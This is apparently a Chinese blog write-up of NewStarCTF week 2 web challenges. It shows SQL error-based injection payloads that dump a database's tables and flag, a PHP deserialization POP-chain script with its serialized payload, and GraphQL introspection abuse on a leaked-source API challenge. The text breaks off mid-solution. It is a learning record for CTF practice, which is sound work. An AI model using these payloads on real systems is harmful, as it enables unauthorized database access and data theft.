<!DOCTYPE html>
<html lang="zh-CN">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  
  
  <title>NewStarCTFweek2 | 无终的博客</title>
  <meta name="author" content="无终" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="" />
  
  <meta name="description" content="#NewStarCTFweek2学习记录##Word-For-You(2 Gen)###解题  与week1一样，是sql注入类型。 使用报错注入。首先爆库。 我先使用了之前用过的报错注入语句，其中利用’()’来绕过空格（这个没必要，我只是因为有现成的就用了） 11&amp;#x27;^extractvalue(1,concat(&amp;#x27;~&amp;#x27;,(select(group_concat(dat">
<meta property="og:type" content="article">
<meta property="og:title" content="NewStarCTFweek2">
<meta property="og:url" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/index.html">
<meta property="og:site_name" content="无终的博客">
<meta property="og:description" content="#NewStarCTFweek2学习记录##Word-For-You(2 Gen)###解题  与week1一样，是sql注入类型。 使用报错注入。首先爆库。 我先使用了之前用过的报错注入语句，其中利用’()’来绕过空格（这个没必要，我只是因为有现成的就用了） 11&amp;#x27;^extractvalue(1,concat(&amp;#x27;~&amp;#x27;,(select(group_concat(dat">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221023192111772.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221023193448351.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221023192544707.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221023193826435.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221023201358856.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221028211143467.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221029153306138.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221029153552761.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221029153807888.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221029160702119.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221029171505544.png">
<meta property="og:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221029172530817.png">
<meta property="article:published_time" content="2022-10-23T10:28:56.000Z">
<meta property="article:modified_time" content="2022-10-29T09:44:51.232Z">
<meta property="article:author" content="无终">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/image-20221023192111772.png">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" media="all"></script>
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-color-dark.min.css" media="(prefers-color-scheme: dark)"></script>
    <script src="/js/kr-dark.min.js"></script>
  
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" media="all"></script>
  
  
  <link rel="stylesheet" id="fontawe-css" href="/vendors/font-awesome@4.7.0/css/font-awesome.min.css" media="all"></script>
  <link rel="stylesheet" id="nprogress-css" href="/vendors/nprogress@0.2.0/nprogress.css" media="all"></script>
  
  
    <link rel="stylesheet" href="/vendors/aplayer@1.10.1/dist/APlayer.min.css"></script>
  
  
    <link rel="stylesheet" href="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"></script>
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="/vendors/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="/vendors/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner.webp');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/bg.webp');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 6.3.0"></head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                    
                                        
                                            <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                        
                                    
                                        
                                            <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                        
                                    
                                        
                                            <li><a href="/friends/"><i class="fa fa-paw"></i>好伙伴</a></li>
                                        
                                    
                                        
                                            <li>
                                                <a><i class="fa fa-link"></i>链接</a>
                                                <ul class="sub-menu">
                                                    
                                                        
                                                    
                                                        
                                                            <li><a target="_blank" rel="noopener" href="https://candinya.com">作者博客</a></li>
                                                        
                                                    
                                                        
                                                            <li><a target="_blank" rel="noopener" href="https://github.com/Candinya/Kratos-Rebirth">项目链接</a></li>
                                                        
                                                    
                                                </ul>
                                            </li>
                                        
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">无终的博客</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>无终的博客</h2> <br />
                        <span></span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

            <section class="col-md-8">

        

            <article itemscope itemtype="https://schema.org/Article">
    
    <link itemprop="mainEntityOfPage" href="http://wuz-zhong.github.io/2022/10/23/NewStarCTFweek2/">
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center" itemprop="name headline">NewStarCTFweek2</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><time datetime="2022-10-23T10:28:56.000Z" itemprop="datePublished"><i class="fa fa-calendar"></i> 2022-10-23</time></li>
                <li itemprop="author" itemscope itemtype="https://schema.org/Person">
                    <i class="fa fa-user"></i> 作者 <span itemprop="name">无终</span>
                </li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~6.62K
                    
                    字
                </li>
                
            </ul>
        </header>
        <div class="kratos-post-content">
            
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                <div class="icon"><i class="fa fa-warning"></i></div>
                <div class="text"><p>本文最后编辑于 <time datetime="1667036691232"></time> 前，其中的内容可能需要更新。</p></div>
            </div>
            
            
            
            <hr />
            <div itemprop="articleBody"><h1 id="NewStarCTFweek2学习记录"><a href="#NewStarCTFweek2学习记录" class="headerlink" title="#NewStarCTFweek2学习记录"></a>#NewStarCTFweek2学习记录</h1><h2 id="Word-For-You-2-Gen"><a href="#Word-For-You-2-Gen" class="headerlink" title="##Word-For-You(2 Gen)"></a>##Word-For-You(2 Gen)</h2><h3 id="解题"><a href="#解题" class="headerlink" title="###解题"></a>###解题</h3><img src="/2022/10/23/NewStarCTFweek2/image-20221023192111772.png" class>

<p>与week1一样，是sql注入类型。</p>
<p>使用报错注入。首先爆库。</p>
<p>我先使用了之前用过的报错注入语句，其中利用’()’来绕过空格（这个没必要，我只是因为有现成的就用了）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;^extractvalue(1,concat(&#x27;~&#x27;,(select(group_concat(database()))from(information_schema.tables))))#</span><br></pre></td></tr></table></figure>

<p>结果如下运行结果如下</p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221023193448351.png" class>

<p>可以看到数据库名为wfy</p>
<p>接下来爆表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;^extractvalue(1,concat(&#x27;~&#x27;,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))))#</span><br></pre></td></tr></table></figure>

<img src="/2022/10/23/NewStarCTFweek2/image-20221023192544707.png" class>

<p>可以看到有三个表，可以一个一个去试，最后的flag是在wfy_comment。</p>
<p>爆字段。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;^extractvalue(1,concat(&#x27;~&#x27;,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(&#x27;wfy_comments&#x27;))))#</span><br></pre></td></tr></table></figure>

<img src="/2022/10/23/NewStarCTFweek2/image-20221023193826435.png" class>

<p>flag在text字段。</p>
<p>使用</p>
<p><code>1&#39;^extractvalue(1,concat(&#39;~&#39;,(select text from wfy_comments limit 11,1)))#</code></p>
<p>或</p>
<p><code>1&#39; and updatexml(1,concat(0x7e,(select text from wfy_comments limit 11,1),0x7e),1)#</code></p>
<p>其中的 11 是试出来的。</p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221023201358856.png" class>

<h2 id="IncludeOne"><a href="#IncludeOne" class="headerlink" title="##IncludeOne"></a>##IncludeOne</h2><p>详见<a target="_blank" rel="noopener" href="https://wuzhong108.cn/2022/10/16/IncludeOne/">IncludeOne | 无终的博客 (wuzhong108.cn)</a></p>
<h2 id="UnserializeOne"><a href="#UnserializeOne" class="headerlink" title="##UnserializeOne"></a>##UnserializeOne</h2><h3 id="解题-1"><a href="#解题-1" class="headerlink" title="###解题"></a>###解题</h3><p>题目源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">\<span class="comment">#Something useful for you : https://zhuanlan.zhihu.com/p/377676274</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Start</span></span>&#123;</span><br><span class="line">  <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line">  <span class="keyword">protected</span> <span class="variable">$func</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Welcome to NewStarCTF, &quot;</span>.<span class="variable language_">$this</span>-&gt;name;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__isset</span>(<span class="params"><span class="variable">$var</span></span>)</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    (<span class="variable language_">$this</span>-&gt;func)();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Sec</span></span>&#123;</span><br><span class="line">  <span class="keyword">private</span> <span class="variable">$obj</span>;</span><br><span class="line">  <span class="keyword">private</span> <span class="variable">$var</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    <span class="variable language_">$this</span>-&gt;obj-&gt;<span class="title function_ invoke__">check</span>(<span class="variable">$this</span>-&gt;<span class="keyword">var</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;CTFers&quot;</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;/flag&#x27;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Easy</span></span>&#123;</span><br><span class="line">  <span class="keyword">public</span> <span class="variable">$cla</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$fun</span>, <span class="variable">$var</span></span>)</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    <span class="variable language_">$this</span>-&gt;cla = <span class="keyword">clone</span> <span class="variable">$var</span>[<span class="number">0</span>];</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">eeee</span></span>&#123;</span><br><span class="line">  <span class="keyword">public</span> <span class="variable">$obj</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__clone</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable language_">$this</span>-&gt;obj-&gt;cmd))&#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&quot;success&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;pop&#x27;</span>]))&#123;</span><br><span class="line">  <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;pop&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>题目是一个反序列化漏洞，那么解题思路就是通过自己编写并实例化其中一个类，然后利用其中的函数调用来实现文件阅读的目的，并将其序列化后传入 pop。</p>
<p>我们可以看到读取flag的代码在__invoke这个魔术方法。</p>
<p>在编写序列化生成前需要了解的知识。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">__construct()，类的构造函数</span><br><span class="line"></span><br><span class="line">__destruct()，类的析构函数</span><br><span class="line"></span><br><span class="line">__call()，在对象中调用一个不可访问方法时调用</span><br><span class="line"></span><br><span class="line">__callStatic()，用静态方式中调用一个不可访问方法时调用</span><br><span class="line"></span><br><span class="line">__get()，获得一个类的成员变量时调用</span><br><span class="line"></span><br><span class="line">__set()，设置一个类的成员变量时调用</span><br><span class="line"></span><br><span class="line">__isset()，当对不可访问属性调用isset()或empty()时调用</span><br><span class="line"></span><br><span class="line">__unset()，当对不可访问属性调用unset()时被调用。</span><br><span class="line"></span><br><span class="line">__sleep()，执行serialize()时，先会调用这个函数</span><br><span class="line"></span><br><span class="line">__wakeup()，执行unserialize()时，先会调用这个函数</span><br><span class="line"></span><br><span class="line">__toString()，类被当成字符串时的回应方法</span><br><span class="line"></span><br><span class="line">__invoke()，调用函数的方式调用一个对象时的回应方法</span><br><span class="line"></span><br><span class="line">__set_state()，调用var_export()导出类时，此静态方法会被调用。</span><br><span class="line"></span><br><span class="line">__clone()，当对象复制完成时调用</span><br><span class="line"></span><br><span class="line">__autoload()，尝试加载未定义的类</span><br><span class="line"></span><br><span class="line">__debugInfo()，打印所需调试信息</span><br></pre></td></tr></table></figure>

<p>详细信息见<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/377676274">PHP反序列化研究 - 知乎 (zhihu.com)</a></p>
<p>我们要触发 <code>__invoke</code>这个方法就需要Start类中的<code>__isset</code>魔术方法，这个方法内的<code>($this-&gt;func)()</code>是关键;</p>
<p>那我们想要触发<code>__isset</code>这个方法我们就需要eeee类中的<code>__clone</code>魔术方法,因为这个方法内有<code>isset()</code>这个检查函数，而当检查函数内部的值为不可访问的属性时，就会调用<code>__isset</code>这个魔术方法;</p>
<p>那我们想要触发<code>__clone</code>这个方法，需要Easy类中的<code>__call</code>方法，因为该方法内有使用<code>clone</code>这个功能，当克隆结束时会调用__clone方法;</p>
<p>那我们想要触发<code>__call</code>方法就需要<code>__toString()</code>这个魔术方法,因为<code>__toString(</code>)方法内有对象调用,当调用对象不可访问时，就会自动调用<code>__call</code>这个魔术方法;</p>
<p>由于反序列化会优先执行__destruct这个方法，所以利用该方法来进入<code>__toString()</code>方法，该方法在类被当做字符串时会调用，因为<code>__destruct()</code>使用了echo，所以会调用_<code>_toString()</code>方法;</p>
<p>所以pop链为:</p>
<p>Sec::__invoke() &lt;- Start::__isset() &lt;- eeee::__clone() &lt;- Easy::__call() &lt;- Sec::__toString() &lt;- Start::__destruct()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Start</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$func</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Sec</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$obj</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$var</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Easy</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$cla</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">eeee</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$obj</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$start</span> = <span class="keyword">new</span> <span class="title class_">Start</span>();</span><br><span class="line"><span class="variable">$sec</span> = <span class="keyword">new</span> <span class="title class_">Sec</span>();</span><br><span class="line"><span class="variable">$easy</span> = <span class="keyword">new</span> <span class="title class_">Easy</span>();</span><br><span class="line"><span class="variable">$eeee</span> = <span class="keyword">new</span> <span class="title function_ invoke__">eeee</span>();</span><br><span class="line"><span class="variable">$eeee</span>-&gt;obj = <span class="variable">$start</span>;</span><br><span class="line"><span class="variable">$sec</span>-&gt;obj = <span class="variable">$easy</span>;</span><br><span class="line"><span class="variable">$sec</span>-&gt;<span class="keyword">var</span> = <span class="variable">$eeee</span>;</span><br><span class="line"><span class="variable">$start</span>-&gt;name = <span class="variable">$sec</span>;</span><br><span class="line"><span class="variable">$start</span>-&gt;func = <span class="variable">$sec</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$start</span>);</span><br><span class="line"> <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出结果为</p>
<p><code>O:5:&quot;Start&quot;:2:&#123;s:4:&quot;name&quot;;O:3:&quot;Sec&quot;:2:&#123;s:3:&quot;obj&quot;;O:4:&quot;Easy&quot;:1:&#123;s:3:&quot;cla&quot;;N;&#125;s:3:&quot;var&quot;;O:4:&quot;eeee&quot;:1:&#123;s:3:&quot;obj&quot;;r:1;&#125;&#125;s:4:&quot;func&quot;;r:2;&#125;</code></p>
<p>将其作为参数<code>pop</code>提交</p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221028211143467.png" class>

<h2 id="ezAPI"><a href="#ezAPI" class="headerlink" title="##ezAPI"></a>##ezAPI</h2><h3 id="解题-2"><a href="#解题-2" class="headerlink" title="###解题"></a>###解题</h3><h4 id="题目页面"><a href="#题目页面" class="headerlink" title="####题目页面"></a>####题目页面</h4><img src="/2022/10/23/NewStarCTFweek2/image-20221029153306138.png" class>

<p>只有一个搜索框，怀疑是sql注入</p>
<p>ctrl+u查看页面源码后发现了一个提示性的语句。</p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221029153552761.png" class>

<p>通过<a target="_blank" rel="noopener" href="http://www.zip可以下载到源码/">www.zip可以下载到源码</a></p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221029153807888.png" class>

<p>打开内部的index.php可以查看源码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">        <span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line">        <span class="variable">$id</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">waf</span>(<span class="params"><span class="variable">$str</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">          <span class="keyword">if</span> (!<span class="title function_ invoke__">is_numeric</span>(<span class="variable">$str</span>) || <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/[0-9]/&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$str</span>) !== <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> False;</span><br><span class="line">          &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> True;</span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">send</span>(<span class="params"><span class="variable">$data</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">          <span class="variable">$options</span> = <span class="keyword">array</span>(</span><br><span class="line">            <span class="string">&#x27;http&#x27;</span> =&gt; <span class="keyword">array</span>(</span><br><span class="line">              <span class="string">&#x27;method&#x27;</span> =&gt; <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">              <span class="string">&#x27;header&#x27;</span> =&gt; <span class="string">&#x27;Content-type: application/json&#x27;</span>,</span><br><span class="line">              <span class="string">&#x27;content&#x27;</span> =&gt; <span class="variable">$data</span>,</span><br><span class="line">              <span class="string">&#x27;timeout&#x27;</span> =&gt; <span class="number">10</span> * <span class="number">60</span></span><br><span class="line">            )</span><br><span class="line">          );</span><br><span class="line">          <span class="variable">$context</span> = <span class="title function_ invoke__">stream_context_create</span>(<span class="variable">$options</span>);</span><br><span class="line">          <span class="variable">$result</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;http://graphql:8080/v1/graphql&quot;</span>, <span class="literal">false</span>, <span class="variable">$context</span>);</span><br><span class="line">          <span class="keyword">return</span> <span class="variable">$result</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$id</span>)) &#123;</span><br><span class="line">          <span class="keyword">if</span> (<span class="title function_ invoke__">waf</span>(<span class="variable">$id</span>)) &#123;</span><br><span class="line">            <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;data&#x27;</span>]) ? <span class="variable">$data</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;data&#x27;</span>] : <span class="variable">$data</span> = <span class="string">&#x27;&#123;&quot;query&quot;:&quot;query&#123;\nusers_user_by_pk(id:&#x27;</span> . <span class="variable">$id</span> . <span class="string">&#x27;) &#123;\nname\n&#125;\n&#125;\n&quot;, &quot;variables&quot;:null&#125;&#x27;</span>;</span><br><span class="line">            <span class="variable">$res</span> = <span class="title function_ invoke__">json_decode</span>(<span class="title function_ invoke__">send</span>(<span class="variable">$data</span>));</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$res</span>-&gt;data-&gt;users_user_by_pk-&gt;name !== <span class="literal">NULL</span>) &#123;</span><br><span class="line">              <span class="keyword">echo</span> <span class="string">&quot;ID: &quot;</span> . <span class="variable">$id</span> . <span class="string">&quot;&lt;br&gt;Name: &quot;</span> . <span class="variable">$res</span>-&gt;data-&gt;users_user_by_pk-&gt;name;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">              <span class="keyword">echo</span> <span class="string">&quot;&lt;b&gt;Can&#x27;t found it!&lt;/b&gt;&lt;br&gt;&lt;br&gt;DEBUG: &quot;</span>;</span><br><span class="line">              <span class="title function_ invoke__">var_dump</span>(<span class="variable">$res</span>-&gt;data);</span><br><span class="line">            &#125;</span><br><span class="line">          &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;&lt;b&gt;Hacker! Only Number!&lt;/b&gt;&quot;</span>);</span><br><span class="line">          &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">          <span class="keyword">die</span>(<span class="string">&quot;&lt;b&gt;No Data?&lt;/b&gt;&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>POST方法传入的参数data为利用点。</p>
<p>如果存在data，则将$_POST[‘data’]赋值给data并利用查询语句查询，不存在，则$data变成利用模板配合id进行查询。</p>
<p>这里的查询语句利用了一个知识，grahpQL查询。</p>
<p>详见<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ">玩转graphQL (qq.com)</a></p>
<p>这里利用连接内博客提到的内省查询可以得到该API端点的所有信息</p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221029160702119.png" class>

<p>通过将该报文另存为php文件，并在vscode中搜索，我们可以找到一个关于flag的接口</p>
<img src="/2022/10/23/NewStarCTFweek2/image-20221029171505544.png" class>

<p>然后我们可以从源码中看到它的接口写法：</p>
<p><code>&#123;&quot;query&quot;:&quot;query&#123;\nusers_user_by_pk(id:&#39; . $id . &#39;) &#123;\nname\n&#125;\n&#125;\n&quot;, &quot;variables&quot;:null&#125;</code></p>
<p>我们套用该接口的写法，将flag的接口写进去。</p>
